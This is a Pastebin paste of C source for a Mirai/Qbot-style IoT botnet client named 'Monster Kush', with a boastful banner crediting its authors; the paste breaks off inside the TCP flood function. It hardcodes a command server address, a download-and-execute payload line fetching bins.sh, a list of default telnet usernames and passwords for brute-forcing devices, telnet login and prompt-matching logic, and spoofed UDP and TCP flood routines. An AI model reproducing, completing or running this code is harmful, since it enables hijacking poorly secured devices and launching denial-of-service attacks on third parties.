Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
- '##::::'##::'#######::'##::: ##::'######::'########:'########:'########:::::'##:::'##:'##::::'##::'######::'##::::'##::::::::::
- ###::'###:'##.... ##: ###:: ##:'##... ##:... ##..:: ##.....:: ##.... ##:::: ##::'##:: ##:::: ##:'##... ##: ##:::: ##::::::::::
- ####'####: ##:::: ##: ####: ##: ##:::..::::: ##:::: ##::::::: ##:::: ##:::: ##:'##::: ##:::: ##: ##:::..:: ##:::: ##::::::::::
- ## ### ##: ##:::: ##: ## ## ##:. ######::::: ##:::: ######::: ########::::: #####:::: ##:::: ##:. ######:: #########::::::::::
- ##. #: ##: ##:::: ##: ##. ####::..... ##:::: ##:::: ##...:::: ##.. ##:::::: ##. ##::: ##:::: ##::..... ##: ##.... ##::::::::::
- ##:.:: ##: ##:::: ##: ##:. ###:'##::: ##:::: ##:::: ##::::::: ##::. ##::::: ##:. ##:: ##:::: ##:'##::: ##: ##:::: ##::::::::::
- ##:::: ##:. #######:: ##::. ##:. ######::::: ##:::: ########: ##:::. ##:::: ##::. ##:. #######::. ######:: ##:::: ##::::::::::
- ..:::::..:::.......:::..::::..:::......::::::..:::::........::..:::::..:::::..::::..:::.......::::......:::..:::::..:::::::::::
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |||||||||||||||||||||||||||| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/|/|
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |/| *** Monster Kush *** |/| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/|/|
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |/| *** Made Date: *** |/| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/|/|
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |/| *** 11-22-16 *** |/| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/|/|
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |/| *** CLIENT *** |/| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/|/|
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |||||||||||||||||||||||||||| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/|/|
- Instragram: @psychedelik_ Psychedelik *** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ *** ~B1NARY~ Twitter: @P2PBOTNET ~/|/|
- *** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ *** XMPP: b1nary@nigge.rs || IG: b1narythag0d ~/|/|
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/|/|
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/|/|
- Me And Psychedelik Met Up In Real Life. *** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ *** Now Think About That For a Minute. /|/|
- And We Made This Dank Ass Bot *** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ *** Damn............Mind Fucked. /|/|
- That You will be using. *** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ *** #MonsterSecurity #MS2K16 #MSWILNEVERDIE /|/|
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/|/|
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/|/|
- /|/|/|/|/|/| Shoutout to Swift IG: @Doxingz || Shout out to Narc IG: @narcotixx || Shout To Pychedelik. IG:@psychedelik_ /|/|
- /|/|/|/|/|/| Shoutout to Bullet. IG: @autism.py || Shout out to Mr Vendetta Twitter: @vendettaondrugs || /|/|
- /|/|/|/|/|/| Shoutout To ~Rev~ Twitter: PmaBotnet || Shoutout to NIghtmare: Instragram: @bins.sh /|/|
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/|/|
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ *** ~~~~~~ MonsterSecurity ~~~~~~ *** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/|/|
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/|/|
- /|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/
- */
- #include <stdlib.h>
- #include <stdarg.h>
- #include <stdio.h>
- #include <sys/socket.h>
- #include <sys/types.h>
- #include <netinet/in.h>
- #include <arpa/inet.h>
- #include <netdb.h>
- #include <signal.h>
- #include <strings.h>
- #include <string.h>
- #include <sys/utsname.h>
- #include <unistd.h>
- #include <fcntl.h>
- #include <errno.h>
- #include <netinet/ip.h>
- #include <netinet/udp.h>
- #include <netinet/tcp.h>
- #include <sys/wait.h>
- #include <sys/ioctl.h>
- #include <net/if.h>
- #include <netinet/ip_icmp.h>
- #define PR_SET_NAME 15
- #define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *))
- #define PAD_RIGHT 1
- #define PAD_ZERO 2
- #define PRINT_BUF_LEN 12
- #define CMD_IAC 255
- #define CMD_WILL 251
- #define CMD_WONT 252
- #define CMD_DO 253
- #define CMD_DONT 254
- #define OPT_SGA 3
- #define PHI 0x9e3779b9
- #define SOCKBUF_SIZE 1024
- unsigned char *commServer[] = { "81.4.123.16:65535" };
- char *BusyboxPayload = "cd /tmp/;busbox wget http://81.4.123.16/bins.sh;sh bins.sh;rm -rf bins.sh";
- char *usernames[] = {
- "\0", //(none):(none)
- "telnet\0", //telnet:telnet
- "admin\0", //admin:admin
- "admin\0", //admin:123
- "admin\0", //admin:1234
- "admin\0", //admin:12345
- "admin\0", //admin:password
- "admin\0", //admin:qwerty
- "root\0", //root:root
- "root\0", //root:123
- "root\0", //root:1234
- "root\0", //root:12345
- "root\0", //root:toor
- "root\0", //root:password
- "root\0", //root:qwerty
- "tim\0", //tim:tim
- "adm\0", //admin:(none)
- "security\0", //security:security
- "user\0", //user:password
- "User\0", //User:Password
- "read\0", //read:synnet
- "write\0", //write:synnet
- "admin\0", //admin:synnet
- "manager\0", //manager:manager
- "monitor\0", //monitor:monitor
- "tech\0", //tech:tech
- "debug\0", //debug:synnet
- "tech\0", //tech:(none)
- };
- char *passwords[] = {
- "\0"
- "telnet\0", //telnet:telnet
- "admin\0", //admin:admin
- "123\0", //admin:123
- "1234\0", //admin:1234
- "12345\0", //admin:12345
- "password\0", //admin:password
- "qwerty\0", //admin:qwerty
- "root\0", //root:root
- "123\0", //root:123
- "1234\0", //root:1234
- "12345\0", //root:12345
- "toor\0", //root:toor
- "password\0", //root:password
- "qwerty\0", //root:qwerty
- "tim\0", //tim:tim
- "\0", //adm:(none)
- "security\0", //security:security
- "password\0", //user:password
- "Password\0", //User:Password
- "synnet\0", //read:synnet
- "synnet\0", //write:synnet
- "synnet\0", //admin:synnet
- "manager\0", //manager:manager
- "monitor\0", //monitor:monitor
- "tech\0", //tech:tech
- "synnet\0", //debug:synnet
- "\0", //tech:(none)
- };
- char *advances[] = {":", "user", "ogin", "name", "pass", "dvrdvs", (char*)0};
- char *fails[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", (char*)0};
- char *successes[] = {"busybox", "$", "#", "shell", "dvrdvs", (char*)0};
- char *advances2[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "busybox", "$", "#", (char*)0};
- static uint32_t Q[4096], c = 362436;
- int initConnection();
- void makeRandomStr(unsigned char *buf, int length);
- int sockprintf(int sock, char *formatStr, ...);
- char *inet_ntoa(struct in_addr in);
- int mainCommSock = 0, currentServer = -1, gotIP = 0;
- uint32_t *pids;
- uint32_t scanPid;
- uint64_t numpids = 0;
- struct in_addr ourIP;
- unsigned char macAddress[6] = {0};
- struct telstate_t
- {
- int fd;
- unsigned int ip;
- unsigned char state;
- unsigned char complete;
- unsigned char usernameInd;
- unsigned char passwordInd;
- unsigned char tempDirInd;
- unsigned int tTimeout;
- unsigned short bufUsed;
- char *sockbuf;
- };
- void init_rand(uint32_t x)
- {
- int i;
- Q[0] = x;
- Q[1] = x + PHI;
- Q[2] = x + PHI + PHI;
- for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
- }
- uint32_t rand_cmwc(void)
- {
- uint64_t t, a = 18782LL;
- static uint32_t i = 4095;
- uint32_t x, r = 0xfffffffe;
- i = (i + 1) & 4095;
- t = a * Q[i] + c;
- c = (uint32_t)(t >> 32);
- x = t + c;
- if (x < c)
- {
- x++;
- c++;
- }
- return (Q[i] = r - x);
- }
- void trim(char *str)
- {
- int i;
- int begin = 0;
- int end = strlen(str) - 1;
- while (isspace(str[begin])) begin++;
- while ((end >= begin) && isspace(str[end])) end--;
- for (i = begin; i <= end; i++) str[i - begin] = str[i];
- str[i - begin] = '\0';
- }
- static void printchar(unsigned char **str, int c)
- {
- if (str)
- {
- **str = c;
- ++(*str);
- }
- else (void)write(1, &c, 1);
- }
- static int prints(unsigned char **out, const unsigned char *string, int width, int pad)
- {
- register int pc = 0, padchar = ' ';
- if (width > 0)
- {
- register int len = 0;
- register const unsigned char *ptr;
- for (ptr = string; *ptr; ++ptr) ++len;
- if (len >= width) width = 0;
- else width -= len;
- if (pad & PAD_ZERO) padchar = '0';
- }
- if (!(pad & PAD_RIGHT))
- {
- for ( ; width > 0; --width)
- {
- printchar (out, padchar);
- ++pc;
- }
- }
- for ( ; *string ; ++string)
- {
- printchar (out, *string);
- ++pc;
- }
- for ( ; width > 0; --width)
- {
- printchar (out, padchar);
- ++pc;
- }
- return pc;
- }
- static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase)
- {
- unsigned char print_buf[PRINT_BUF_LEN];
- register unsigned char *s;
- register int t, neg = 0, pc = 0;
- register unsigned int u = i;
- if (i == 0)
- {
- print_buf[0] = '0';
- print_buf[1] = '\0';
- return prints (out, print_buf, width, pad);
- }
- if (sg && b == 10 && i < 0)
- {
- neg = 1;
- u = -i;
- }
- s = print_buf + PRINT_BUF_LEN-1;
- *s = '\0';
- while (u)
- {
- t = u % b;
- if( t >= 10 )
- t += letbase - '0' - 10;
- *--s = t + '0';
- u /= b;
- }
- if (neg)
- {
- if( width && (pad & PAD_ZERO) )
- {
- printchar (out, '-');
- ++pc;
- --width;
- }
- else
- {
- *--s = '-';
- }
- }
- return pc + prints (out, s, width, pad);
- }
- static int print(unsigned char **out, const unsigned char *format, va_list args )
- {
- register int width, pad;
- register int pc = 0;
- unsigned char scr[2];
- for (; *format != 0; ++format)
- {
- if (*format == '%')
- {
- ++format;
- width = pad = 0;
- if (*format == '\0') break;
- if (*format == '%') goto out;
- if (*format == '-')
- {
- ++format;
- pad = PAD_RIGHT;
- }
- while (*format == '0')
- {
- ++format;
- pad |= PAD_ZERO;
- }
- for ( ; *format >= '0' && *format <= '9'; ++format)
- {
- width *= 10;
- width += *format - '0';
- }
- if( *format == 's' )
- {
- register char *s = (char *)va_arg( args, int );
- pc += prints (out, s?s:"(null)", width, pad);
- continue;
- }
- if( *format == 'd' )
- {
- pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
- continue;
- }
- if( *format == 'x' )
- {
- pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
- continue;
- }
- if( *format == 'X' )
- {
- pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
- continue;
- }
- if( *format == 'u' )
- {
- pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
- continue;
- }
- if( *format == 'c' )
- {
- scr[0] = (unsigned char)va_arg( args, int );
- scr[1] = '\0';
- pc += prints (out, scr, width, pad);
- continue;
- }
- }
- else
- {
- out:
- printchar (out, *format);
- ++pc;
- }
- }
- if (out) **out = '\0';
- va_end( args );
- return pc;
- }
- int zprintf(const unsigned char *format, ...) {
- va_list args;
- va_start( args, format );
- return print( 0, format, args );
- }
- int szprintf(unsigned char *out, const unsigned char *format, ...)
- {
- va_list args;
- va_start( args, format );
- return print( &out, format, args );
- }
- int sockprintf(int sock, char *formatStr, ...)
- {
- unsigned char *textBuffer = malloc(2048);
- memset(textBuffer, 0, 2048);
- char *orig = textBuffer;
- va_list args;
- va_start(args, formatStr);
- print(&textBuffer, formatStr, args);
- va_end(args);
- orig[strlen(orig)] = '\n';
- zprintf("buf: %s\n", orig);
- int q = send(sock,orig,strlen(orig), MSG_NOSIGNAL);
- free(orig);
- return q;
- }
- static int *fdopen_pids;
- int fdpopen(unsigned char *program, register unsigned char *type)
- {
- register int iop;
- int pdes[2], fds, pid;
- if (*type != 'r' && *type != 'w' || type[1]) return -1;
- if (pipe(pdes) < 0) return -1;
- if (fdopen_pids == NULL)
- {
- if ((fds = getdtablesize()) <= 0) return -1;
- if ((fdopen_pids = (int *)malloc((unsigned int)(fds * sizeof(int)))) == NULL) return -1;
- memset((unsigned char *)fdopen_pids, 0, fds * sizeof(int));
- }
- switch (pid = vfork())
- {
- case -1:
- close(pdes[0]);
- close(pdes[1]);
- return -1;
- case 0:
- if (*type == 'r')
- {
- if (pdes[1] != 1)
- {
- dup2(pdes[1], 1);
- close(pdes[1]);
- }
- close(pdes[0]);
- }
- else
- {
- if (pdes[0] != 0)
- {
- (void) dup2(pdes[0], 0);
- (void) close(pdes[0]);
- }
- (void) close(pdes[1]);
- }
- execl("/bin/sh", "sh", "-c", program, NULL);
- _exit(127);
- }
- if (*type == 'r')
- {
- iop = pdes[0];
- (void) close(pdes[1]);
- }
- else
- {
- iop = pdes[1];
- (void) close(pdes[0]);
- }
- fdopen_pids[iop] = pid;
- return (iop);
- }
- int fdpclose(int iop)
- {
- register int fdes;
- sigset_t omask, nmask;
- int pstat;
- register int pid;
- if (fdopen_pids == NULL || fdopen_pids[iop] == 0) return (-1);
- (void) close(iop);
- sigemptyset(&nmask);
- sigaddset(&nmask, SIGINT);
- sigaddset(&nmask, SIGQUIT);
- sigaddset(&nmask, SIGHUP);
- (void) sigprocmask(SIG_BLOCK, &nmask, &omask);
- do
- {
- pid = waitpid(fdopen_pids[iop], (int *) &pstat, 0);
- }
- while (pid == -1 && errno == EINTR);
- (void) sigprocmask(SIG_SETMASK, &omask, NULL);
- fdopen_pids[fdes] = 0;
- return (pid == -1 ? -1 : WEXITSTATUS(pstat));
- }
- unsigned char *fdgets(unsigned char *buffer, int bufferSize, int fd)
- {
- int got = 1, total = 0;
- while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n')
- {
- got = read(fd, buffer + total, 1);
- total++;
- }
- return got == 0 ? NULL : buffer;
- }
- static const long hextable[] =
- {
- [0 ... 255] = -1,
- ['0'] = 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
- ['A'] = 10, 11, 12, 13, 14, 15,
- ['a'] = 10, 11, 12, 13, 14, 15
- };
- long parseHex(unsigned char *hex)
- {
- long ret = 0;
- while (*hex && ret >= 0) ret = (ret << 4) | hextable[*hex++];
- return ret;
- }
- int wildString(const unsigned char* pattern, const unsigned char* string)
- {
- switch(*pattern)
- {
- case '\0': return *string;
- case '*': return !(!wildString(pattern+1, string) || *string && !wildString(pattern, string+1));
- case '?': return !(*string && !wildString(pattern+1, string+1));
- default: return !((toupper(*pattern) == toupper(*string)) && !wildString(pattern+1, string+1));
- }
- }
- int getHost(unsigned char *toGet, struct in_addr *i)
- {
- struct hostent *h;
- if((i->s_addr = inet_addr(toGet)) == -1) return 1;
- return 0;
- }
- void uppercase(unsigned char *str)
- {
- while(*str)
- {
- *str = toupper(*str);
- str++;
- }
- }
- void makeRandomStr(unsigned char *buf, int length)
- {
- int i = 0;
- for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65;
- }
- int recvLine(int socket, unsigned char *buf, int bufsize) {
- memset(buf, 0, bufsize);
- fd_set myset;
- struct timeval tv;
- tv.tv_sec = 30;
- tv.tv_usec = 0;
- FD_ZERO(&myset);
- FD_SET(socket, &myset);
- int selectRtn, retryCount;
- if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
- while(retryCount < 10) {
- sockprintf(mainCommSock, "PING");
- tv.tv_sec = 30;
- tv.tv_usec = 0;
- FD_ZERO(&myset);
- FD_SET(socket, &myset);
- if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
- retryCount++;
- continue;
- }
- break;
- }
- }
- unsigned char tmpchr;
- unsigned char *cp;
- int count = 0;
- cp = buf;
- while(bufsize-- > 1) {
- if(recv(mainCommSock, &tmpchr, 1, 0) != 1) {
- *cp = 0x00;
- return -1;
- }
- *cp++ = tmpchr;
- if(tmpchr == '\n') break;
- count++;
- }
- *cp = 0x00;
- return count;
- }
- int connectTimeout(int fd, char *host, int port, int timeout) {
- struct sockaddr_in dest_addr;
- fd_set myset;
- struct timeval tv;
- socklen_t lon;
- int valopt;
- long arg = fcntl(fd, F_GETFL, NULL);
- arg |= O_NONBLOCK;
- fcntl(fd, F_SETFL, arg);
- dest_addr.sin_family = AF_INET;
- dest_addr.sin_port = htons(port);
- if(getHost(host, &dest_addr.sin_addr)) return 0;
- memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
- int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
- if (res < 0) {
- if (errno == EINPROGRESS) {
- tv.tv_sec = timeout;
- tv.tv_usec = 0;
- FD_ZERO(&myset);
- FD_SET(fd, &myset);
- if (select(fd+1, NULL, &myset, NULL, &tv) > 0) {
- lon = sizeof(int);
- getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
- if (valopt) return 0;
- }
- else return 0;
- }
- else return 0;
- }
- arg = fcntl(fd, F_GETFL, NULL);
- arg &= (~O_NONBLOCK);
- fcntl(fd, F_SETFL, arg);
- return 1;
- }
- int listFork() {
- uint32_t parent, *newpids, i;
- parent = fork();
- if (parent <= 0) return parent;
- numpids++;
- newpids = (uint32_t*)malloc((numpids + 1) * 4);
- for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
- newpids[numpids - 1] = parent;
- free(pids);
- pids = newpids;
- return parent;
- }
- int negotiate(int sock, unsigned char *buf, int len) {
- unsigned char c;
- switch (buf[1]) {
- case CMD_IAC: return 0;
- case CMD_WILL:
- case CMD_WONT:
- case CMD_DO:
- case CMD_DONT:
- c = CMD_IAC;
- send(sock, &c, 1, MSG_NOSIGNAL);
- if (CMD_WONT == buf[1]) c = CMD_DONT;
- else if (CMD_DONT == buf[1]) c = CMD_WONT;
- else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
- else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
- send(sock, &c, 1, MSG_NOSIGNAL);
- send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
- break;
- default:
- break;
- }
- return 0;
- }
- int matchPrompt(char *bufStr) {
- char *prompts = ":>%$#\0";
- int bufLen = strlen(bufStr);
- int i, q = 0;
- for(i = 0; i < strlen(prompts); i++) {
- while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++;
- if(*(bufStr + bufLen - q) == prompts[i]) return 1;
- }
- return 0;
- }
- int readUntil(int fd, char *toFind, int matchLePrompt, int timeout, int timeoutusec, char *buffer, int bufSize, int initialIndex)
- {
- int bufferUsed = initialIndex, got = 0, found = 0;
- fd_set myset;
- struct timeval tv;
- tv.tv_sec = timeout;
- tv.tv_usec = timeoutusec;
- unsigned char *initialRead = NULL;
- while(bufferUsed + 2 < bufSize && (tv.tv_sec > 0 || tv.tv_usec > 0))
- {
- FD_ZERO(&myset);
- FD_SET(fd, &myset);
- if (select(fd+1, &myset, NULL, NULL, &tv) < 1) break;
- initialRead = buffer + bufferUsed;
- got = recv(fd, initialRead, 1, 0);
- if(got == -1 || got == 0) return 0;
- bufferUsed += got;
- if(*initialRead == 0xFF)
- {
- got = recv(fd, initialRead + 1, 2, 0);
- if(got == -1 || got == 0) return 0;
- bufferUsed += got;
- if(!negotiate(fd, initialRead, 3)) return 0;
- }
- else
- {
- if(strstr(buffer, toFind) != NULL || (matchLePrompt && matchPrompt(buffer)))
- {
- found = 1;
- break;
- }
- }
- }
- if(found) return 1;
- return 0;
- }
- in_addr_t getRandomIP(in_addr_t netmask)
- {
- in_addr_t tmp = ntohl(ourIP.s_addr) & netmask;
- return tmp ^ ( rand_cmwc() & ~netmask);
- }
- unsigned short csum (unsigned short *buf, int count)
- {
- register uint64_t sum = 0;
- while( count > 1 )
- {
- sum += *buf++;
- count -= 2;
- }
- if(count > 0)
- {
- sum += *(unsigned char *)buf;
- }
- while (sum>>16)
- {
- sum = (sum & 0xffff) + (sum >> 16);
- }
- return (uint16_t)(~sum);
- }
- unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph)
- {
- struct tcp_pseudo
- {
- unsigned long src_addr;
- unsigned long dst_addr;
- unsigned char zero;
- unsigned char proto;
- unsigned short length;
- }
- pseudohead;
- unsigned short total_len = iph->tot_len;
- pseudohead.src_addr=iph->saddr;
- pseudohead.dst_addr=iph->daddr;
- pseudohead.zero=0;
- pseudohead.proto=IPPROTO_TCP;
- pseudohead.length=htons(sizeof(struct tcphdr));
- int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
- unsigned short *tcp = malloc(totaltcp_len);
- memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
- memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
- unsigned short output = csum(tcp,totaltcp_len);
- free(tcp);
- return output;
- }
- void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize)
- {
- iph->ihl = 5;
- iph->version = 4;
- iph->tos = 0;
- iph->tot_len = sizeof(struct iphdr) + packetSize;
- iph->id = rand_cmwc();
- iph->frag_off = 0;
- iph->ttl = MAXTTL;
- iph->protocol = protocol;
- iph->check = 0;
- iph->saddr = source;
- iph->daddr = dest;
- }
- int sclose(int fd)
- {
- if(3 > fd) return 1;
- close(fd);
- return 0;
- }
- void sendUDP(unsigned char *target, int port, int timeEnd, int spoofit, int packetsize, int pollinterval) {
- struct sockaddr_in dest_addr;
- dest_addr.sin_family = AF_INET;
- if(port == 0) dest_addr.sin_port = rand_cmwc();
- else dest_addr.sin_port = htons(port);
- if(getHost(target, &dest_addr.sin_addr)) return;
- memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
- register unsigned int pollRegister;
- pollRegister = pollinterval;
- if(spoofit == 32)
- {
- int sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
- if(!sockfd)
- {
- sockprintf(mainCommSock, "Failed opening raw socket.");
- return;
- }
- unsigned char *buf = (unsigned char *)malloc(packetsize + 1);
- if(buf == NULL) return;
- memset(buf, 0, packetsize + 1);
- makeRandomStr(buf, packetsize);
- int end = time(NULL) + timeEnd;
- register unsigned int i = 0;
- while(1)
- {
- sendto(sockfd, buf, packetsize, 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
- if(i == pollRegister)
- {
- if(port == 0) dest_addr.sin_port = rand_cmwc();
- if(time(NULL) > end) break;
- i = 0;
- continue;
- }
- i++;
- }
- }
- else {
- int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
- if(!sockfd)
- {
- sockprintf(mainCommSock, "Failed opening raw socket.");
- return;
- }
- int tmp = 1;
- if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)
- {
- sockprintf(mainCommSock, "Failed setting raw headers mode.");
- return;
- }
- int counter = 50;
- while(counter--)
- {
- srand(time(NULL) ^ rand_cmwc());
- init_rand(rand());
- }
- in_addr_t netmask;
- if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
- else netmask = ( ~((1 << (32 - spoofit)) - 1) );
- unsigned char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + packetsize];
- struct iphdr *iph = (struct iphdr *)packet;
- struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
- makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_UDP, sizeof(struct udphdr) + packetsize);
- udph->len = htons(sizeof(struct udphdr) + packetsize);
- udph->source = rand_cmwc();
- udph->dest = (port == 0 ? rand_cmwc() : htons(port));
- udph->check = 0;
- makeRandomStr((unsigned char*)(((unsigned char *)udph) + sizeof(struct udphdr)), packetsize);
- iph->check = csum ((unsigned short *) packet, iph->tot_len);
- int end = time(NULL) + timeEnd;
- register unsigned int i = 0;
- while(1)
- {
- sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
- udph->source = rand_cmwc();
- udph->dest = (port == 0 ? rand_cmwc() : htons(port));
- iph->id = rand_cmwc();
- iph->saddr = htonl( getRandomIP(netmask) );
- iph->check = csum ((unsigned short *) packet, iph->tot_len);
- if(i == pollRegister)
- {
- if(time(NULL) > end) break;
- i = 0;
- continue;
- }
- i++;
- }
- }
- }
- void sendTCP(unsigned char *target, int port, int timeEnd, int spoofit, unsigned char *flags, int packetsize, int pollinterval)
- {
- register unsigned int pollRegister;
- pollRegister = pollinterval;
- struct sockaddr_in dest_addr;
- dest_addr.sin_family = AF_INET;
- if(port == 0) dest_addr.sin_port = rand_cmwc();
- else dest_addr.sin_port = htons(port);
- if(getHost(target, &dest_addr.sin_addr)) return;
- memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
- int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
- if(!sockfd)
- {
- sockprintf(mainCommSock, "Failed opening raw socket.");
- return;
- }
- int tmp = 1;
- if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)
- {
- sockprintf(mainCommSock, "Failed setting raw headers mode.");
- return;
- }
- in_addr_t netmask;
- if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
- else netmask = ( ~((1 << (32 - spoofit)) - 1) );
- unsigned char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + packetsize];
- struct iphdr *iph = (struct iphdr *)packet;
- struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
- makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_TCP, sizeof(struct tcphdr) + packetsize);
- tcph->source = rand_cmwc();
- tcph->seq = rand_cmwc();
- tcph->ack_seq = 0;
- tcph->doff = 5;
- if(!strcmp(flags, "ALL"))
- {
- tcph->syn = 1;
- tcph->rst = 1;
- tcph->fin = 1;
- tcph->ack = 1;
- tcph->psh = 1;
- }
- else
- {
- unsigned char *pch = strtok(flags, ",");
- while(pch)
- {
- if(!strcmp(pch, "SYN"))
- {
- tcph->syn = 1;
- }
- else if(!strcmp(pch, "RST"))
- {
- tcph->rst = 1;
- }
- else if(!strcmp(pch, "FIN"))
- {
- tcph->fin = 1;
- }
- else if(!strcmp(pch, "ACK"))
- {
- tcph->ack = 1;
- }
- else if(!strcmp(pch, "PSH"))
- {
- tcph->psh = 1;
- }
- else
- {
- sockprintf(mainCommSock, "Invalid flag \"%s\"", pch);
- }
- pch = strtok(NULL, ",");
- }
- }
- tcph->window = rand_cmwc();
- tcph->check = 0;
- tcph->urg_ptr = 0;
- tcph->dest = (port == 0 ? rand_cmwc() : htons(port));
- tcph->check = tcpcsum(iph, tcph);
- iph->check = csum ((unsigned short *) packet, iph->tot_len);
- int end = time(NULL) + timeEnd;
- register unsigned int i = 0;
- while(1)
- {
- sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
- iph->saddr = htonl( getRandomIP(netmask) );
- iph->id = rand_cmwc();
- tcph->seq = rand_cmwc();
- tcph->source = rand_cmwc();
- tcph->check = 0;
- tcph->check = tcpcsum(iph, tcph);
- iph->check = csum ((unsigned short *) packet, iph->tot_len);
- if(i == pollRegister)
- {
